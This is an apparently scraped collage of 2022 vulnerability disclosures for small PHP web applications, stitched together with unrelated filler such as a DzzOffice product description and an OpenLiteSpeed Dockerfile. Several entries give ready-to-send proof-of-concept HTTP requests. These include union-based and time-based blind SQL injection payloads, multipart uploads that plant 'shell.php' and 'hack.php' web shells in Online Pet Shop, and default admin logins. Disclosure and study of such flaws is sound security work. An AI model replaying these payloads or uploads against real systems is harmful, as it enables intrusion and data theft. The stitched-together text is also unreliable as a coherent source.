Canteen Management System v1.0 was discovered to contain a SQL injection vulnerability via the productId parameter at /php_action/fetchSelectedfood.php.

**Canteen Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Pengxuan Li

vendors: https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability File: /youthappam/php\_action/fetchSelectedfood.php

Vulnerability location: /youthappam/php\_action/fetchSelectedfood.php, productId

dbname =youthappam,length=10

\[+\] Payload: productId=-1 union select 1,database(),3,4,5,6,7,8,9 // Leak place ---> productId

POST /youthappam/php\_action/fetchSelectedfood.php HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=lf9hph2449vgrcadcct2jgd8ne
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
productId=-1 union select 1,database(),3,4,5,6,7,8,9

CVE-2022-43276: bug_report/SQLi-1.md at main · 01001000entai/bug_report

A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. This affects an unknown part of the file Admin/edit-admin.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212415.

靳亚东  于 2022-10-27 15:16:33 发布  20  收藏

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)  
url:/Admin/edit-admin.php  
URI parameter ‘id’ is vulnerable

Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

    Parameter: #1* (URI)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP
    

  
Download Code:  
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html

CVE-2022-3733: Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)_靳亚东的博客-CSDN博客

Advantech R-SeeNet Versions 2.4.19 and prior are vulnerable to path traversal attacks. An unauthorized attacker could remotely exploit vulnerable PHP code to delete .PDF files.

CVE-2022-3387

A Cross-Site Request Forgery (CSRF) in dzzoffice 2.02.1_SC_UTF8 allows attackers to arbitrarily create user accounts and grant Administrator rights to regular users.

**dzzoffice****官方网站:http://dzzoffice.com****演示地址:http://demo.dzzoffice.com****DzzOffice 介绍：**

Dzzoffice是一套开源办公套件，适用于企业、团队搭建自己的 类似“Google企业应用套件”、“微软Office365”的企业协同办公平台。套件由多个工具组成，包含但不限于如：

**网盘**: 企业、团队文件集中管理。主要体现的功能是支持企业部门的组织架构建立共享目录，也支持组的方式灵活建立共享目录。支持文件标签，多版本，评论，详细的目录权限等协作功能。

**文档**: 在线 Word 文档协作工具。前端做了一套模板管理，用于企业添加自己的常用文档模板，如空白合同。后端支持 office online server，onlyoffice，collaboraoffice 来实现文档预览与协同编辑。

**表格**: 在线 Excel 协作工具。同上

**演示文稿**: 在线 PPT 文档浏览、编辑工具。同上

**记录**: 多人参与协作的记录本，主要体现协作记录内容。

**新闻**: 文章系统，可用于企业新闻，通知等用途

**通讯录**: 企业人员联系方式查询

**文集**: 通过树形目录有序管理文档。支持 Markdown 编辑，支持导入导出 txt，epub、mobi、azw3

**相册**： 企业，团队图片管理

**任务板**: 任务管理、团队协作

**讨论板**: 内部论坛设置

**表单**: 表单，问卷工具

企业根据需要可以只使用一款工具，也可以多款工具组合使用。例如团队需要一个任务管理工具，可以只安装一个任务板，登陆系统会直接进入任务板工具，没有其他工具的干扰。如果多个工具组合使用，可以设置默认登陆到哪个工具里。

除了以上自己开发了一些工具，套件里还集成了大量的其他开源工具，如网盘里用到的在线压缩、解压，各类媒体文件预览，各类文档预览与编辑的支持，是各类开源程序的综合利用。

**DzzOffice2.01主要更新内容**

1.  增加 云设置和管理 ，支持阿里云存储、七牛云存储、FTP/SFTP、本地磁盘等存储方式；
    
2.  增加 用户资料管理 ，支持自定义用户资料项，资料审核、认证和审核；
    
3.  修改应用市场应用在线安装方式，提高应用下载速度；
    
4.  增加伪静态支持，可以通过应用“伪静态管理”灵活配置各个页面的伪静态规则；
    
5.  机构和用户管理 优化添加部门管理员的体验；
    
6.  导入导出用户功能优化调整；
    
7.  部分页面移动端适配；
    
8.  增加首次安装引导页，引导管理员首次能正确配置系统；
    
9.  开放讨论板应用（可在应用市场内在线安装）；
    
10.  开放任务板应用（可在应用市场内在线安装）；
    
11.  其他功能完善、及beta版反馈问题的修复；
    

**DzzOffice在线更新方法**

1.  进入您原来的系统，关闭您的站点。进行数据备份；
    
2.  备份文件（如果有程序文件或风格文件的改动）；
    
3.  进入 管理 -> 系统工具 -> 在线更新，按提示完成更新任务；
    
4.  系统工具 -> 更新系统缓存；
    
5.  系统设置 -> 打开站点。
    

**DzzOffice离线更新方法（仅支持从2.0beta版升级）**

1.  进入您原来的系统，关闭您的站点。进行数据备份；
    
2.  备份文件（如果有程序文件或风格文件的改动）；
    
3.  下载并解压缩最新版的程序包；
    
4.  程序包解压缩后，并且将文件上传到网站根目录覆盖；
    
5.  访问 http://您的域名/install/update.php。
    
6.  按照程序提示，直至所有升级完毕。删除install/update.php 程序，以免被恶意利用。
    
7.  进入管理员桌面，更新缓存。
    
8.  系统设置 -> 打开站点。

CVE-2022-43340: GitHub - zyx0814/dzzoffice: dzzoffice

Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the Product List module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.

**Online Pet Shop We App v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: z1pwn

Admind login account: admin/admin123

vendor: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

Vulnerability url: http://ip/pet\_shop/classes/Master.php?f=save\_product

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the picture upload point of the editing function of the product list module in the background management system

Request package for file upload：

POST /pet\_shop/classes/Master.php?f\=save\_product HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/pet\_shop/admin/?page=product/manage\_product&id=6
Content-Length: 2685
Content-Type: multipart/form-data; boundary=---------------------------162223033527413
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
\-----------------------------162223033527413
Content-Disposition: form-data; name="id"
6
\-----------------------------162223033527413
Content-Disposition: form-data; name="category\_id"
4
\-----------------------------162223033527413
Content-Disposition: form-data; name="sub\_category\_id"
4
\-----------------------------162223033527413
Content-Disposition: form-data; name="product\_name"
Dog Belt
\-----------------------------162223033527413
Content-Disposition: form-data; name="description"
<p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas dui nulla, tincidunt in arcu at, vulputate volutpat velit. Quisque volutpat gravida erat, gravida porttitor magna malesuada sed. Curabitur massa est, ullamcorper a diam vitae, tincidunt sagittis justo. Nam eu orci ligula. Duis ullamcorper dui at nisi consequat, sed suscipit sapien lacinia. Praesent ut lacus id arcu bibendum egestas. Cras ullamcorper dictum mi, non commodo mauris iaculis a. Pellentesque porta sem id dapibus tincidunt. Aenean metus tellus, efficitur ut feugiat in, euismod et arcu. In pharetra, dolor in fermentum facilisis, metus urna lacinia metus, in maximus justo tellus et tortor. Nam pulvinar eu enim auctor pellentesque.</p><p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;">Nam ut quam velit. Suspendisse commodo non urna nec dictum. Pellentesque eget enim id velit bibendum auctor vel id lectus. Maecenas dolor nibh, ultricies eget metus vel, efficitur varius tellus. Donec semper eros sit amet urna bibendum scelerisque. Interdum et malesuada fames ac ante ipsum primis in faucibus. Integer cursus est in sapien sodales, quis pulvinar nisl aliquet. Pellentesque blandit diam lobortis pulvinar ornare. Sed venenatis imperdiet massa, ut mollis sapien sagittis a. Nulla dignissim ultrices metus a mattis. Nunc egestas mattis nisl at posuere. Donec malesuada ut justo sed aliquam. Sed venenatis sit amet tortor et semper. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Vivamus sit amet massa at massa malesuada volutpat quis nec libero.</p>
\-----------------------------162223033527413
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream
\-----------------------------162223033527413
Content-Disposition: form-data; name="status"
1
\-----------------------------162223033527413
Content-Disposition: form-data; name="img\[\]"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------162223033527413--

The files will be uploaded to this directory \\pet\_shop\\uploads\\product\_6 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-39978: bug_report/RCE-1.md at main · z1pwn/bug_report

Online Pet Shop We App v1.0 was discovered to contain an arbitrary file upload vulnerability via the Editing function in the User module. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file uploaded through the picture upload point.

Permalink

Cannot retrieve contributors at this time

**Online Pet Shop We App v1.0 by oretnom23 has arbitrary code execution (RCE)**

BUG\_Author: z1pwn

Admind login account: admin/admin123

vendor: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

Vulnerability url: http://ip/pet\_shop/admin/?page=user ---> http://ip/pet\_shop/classes/Users.php?f=save

Loophole location：The editing function of the "user" module in the background management system there is an arbitrary file upload vulnerability in the picture upload point.

Request package for file upload：

POST /pet\_shop/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/pet\_shop/admin/?page=user
Content-Length: 748
Content-Type: multipart/form-data; boundary=---------------------------192831994119577
Cookie: PHPSESSID=k8u390ikl968phg971gmpmhtj5
Connection: close
\-----------------------------192831994119577
Content-Disposition: form-data; name="id"
1
\-----------------------------192831994119577
Content-Disposition: form-data; name="firstname"
Adminstrator
\-----------------------------192831994119577
Content-Disposition: form-data; name="lastname"
Admin
\-----------------------------192831994119577
Content-Disposition: form-data; name="username"
admin
\-----------------------------192831994119577
Content-Disposition: form-data; name="password"
admin123
\-----------------------------192831994119577
Content-Disposition: form-data; name="img"; filename="hack.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------192831994119577--

The files will be uploaded to this directory \\pet\_shop\\uploads 

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-39977: bug_report/RCE-2.md at main · z1pwn/bug_report

School Activity Updates with SMS Notification v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /modules/announcement/index.php?view=edit&id=.

**School Activity Updates with SMS Notification v1.0 by janobe has SQL injection**

BUG\_Author: z1pwn

Login account: admin/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/13799/school-activity-updates-sms-notification-phppdo.html

The program is built using the xmapp-php5.6 version

Vulnerability File: /activity/admin/modules/announcement/index.php?view=edit&id=

Vulnerability location: /activity/admin/modules/announcement/index.php?view=edit&id=, id

dbname =db\_wvsu

\[+\] Payload: /activity/admin/modules/announcement/index.php?view=edit&id=-201900050%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /activity/admin/modules/announcement/index.php?view\=edit&id\=\-201900050%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close

CVE-2022-39976: bug_report/SQLi-1.md at main · z1pwn/bug_report

Untrusted Search Path vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Container allows Privilege Escalation. This affects versions from 1.6.15 before 1.7.16.1.

Permalink

**3** contributors

**Users who have contributed to this file**

  

FROM ubuntu:22.04

ARG OLS\_VERSION

ARG PHP\_VERSION

RUN apt-get update && apt-get install wget curl cron tzdata -y

RUN wget https://openlitespeed.org/preuse/openlitespeed-$OLS\_VERSION.tgz && \\

tar xzf openlitespeed-$OLS\_VERSION.tgz && cd openlitespeed && ./install.sh && \\

echo 'cloud-docker' > /usr/local/lsws/PLAT && rm -rf /openlitespeed && rm /openlitespeed-$OLS\_VERSION.tgz

RUN apt-get install mysql-client $PHP\_VERSION $PHP\_VERSION-common $PHP\_VERSION-mysql $PHP\_VERSION-opcache \\

$PHP\_VERSION-curl $PHP\_VERSION-imagick $PHP\_VERSION-redis $PHP\_VERSION-memcached $PHP\_VERSION-intl -y

RUN \["/bin/bash", "-c", "if \[\[ $PHP\_VERSION == lsphp7\* \]\]; then apt-get install $PHP\_VERSION-json -y; fi"\]

RUN wget -O /usr/local/lsws/admin/misc/lsup.sh \\

https://raw.githubusercontent.com/litespeedtech/openlitespeed/master/dist/admin/misc/lsup.sh && \\

chmod +x /usr/local/lsws/admin/misc/lsup.sh

RUN curl -O https://raw.githubusercontent.com/wp-cli/builds/gh-pages/phar/wp-cli.phar && \\

chmod +x wp-cli.phar && mv wp-cli.phar /usr/bin/wp && \\

ln -s /usr/local/lsws/$PHP\_VERSION/bin/php /usr/bin/php

RUN wget -O - https://get.acme.sh | sh

EXPOSE 7080

ENV PATH="/usr/local/sbin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bin"

ADD docker.conf /usr/local/lsws/conf/templates/docker.conf

ADD setup\_docker.sh /usr/local/lsws/bin/setup\_docker.sh

ADD httpd\_config.xml /usr/local/lsws/conf/httpd\_config.xml

ADD htpasswd /usr/local/lsws/admin/conf/htpasswd

RUN /usr/local/lsws/bin/setup\_docker.sh && rm /usr/local/lsws/bin/setup\_docker.sh

RUN chown 999:999 /usr/local/lsws/conf -R

RUN cp -RP /usr/local/lsws/conf/ /usr/local/lsws/.conf/

RUN cp -RP /usr/local/lsws/admin/conf /usr/local/lsws/admin/.conf/

#RUN sed -i "s|fcgi-bin/lsphp|/usr/local/lsws/$PHP\_VERSION/bin/lsphp|g" /usr/local/lsws/conf/httpd\_config.conf

RUN \["/bin/bash", "-c", "if \[\[ $PHP\_VERSION == lsphp8\* \]\]; then ln -sf /usr/local/lsws/$PHP\_VERSION/bin/lsphp /usr/local/lsws/fcgi-bin/lsphp8; fi"\]

RUN \["/bin/bash", "-c", "if \[\[ $PHP\_VERSION == lsphp8\* \]\]; then ln -sf /usr/local/lsws/fcgi-bin/lsphp8 /usr/local/lsws/fcgi-bin/lsphp; fi"\]

RUN \["/bin/bash", "-c", "if \[\[ $PHP\_VERSION == lsphp7\* \]\]; then ln -sf /usr/local/lsws/$PHP\_VERSION/bin/lsphp /usr/local/lsws/fcgi-bin/lsphp7; fi"\]

RUN \["/bin/bash", "-c", "if \[\[ $PHP\_VERSION == lsphp7\* \]\]; then ln -sf /usr/local/lsws/fcgi-bin/lsphp7 /usr/local/lsws/fcgi-bin/lsphp; fi"\]

COPY entrypoint.sh /entrypoint.sh

RUN chmod +x /entrypoint.sh

ENTRYPOINT \["/entrypoint.sh"\]

WORKDIR /var/www/vhosts/

CVE-2022-0074: ols-dockerfiles/Dockerfile at master · litespeedtech/ols-dockerfiles

Improper Input Validation vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Dashboard allows Command Injection. This affects 1.7.0 versions before 1.7.16.1.

CVE-2022-0073: openlitespeed/CValidation.php at v1.7.16 · litespeedtech/openlitespeed

Directory Traversal vulnerability in LiteSpeed Technologies OpenLiteSpeed Web Server Dashboard allows Path Traversal. This affects versions from 1.5.11 through 1.5.12, from 1.6.5 through 1.6.20.1, from 1.7.0 before 1.7.16.1

Tag

#php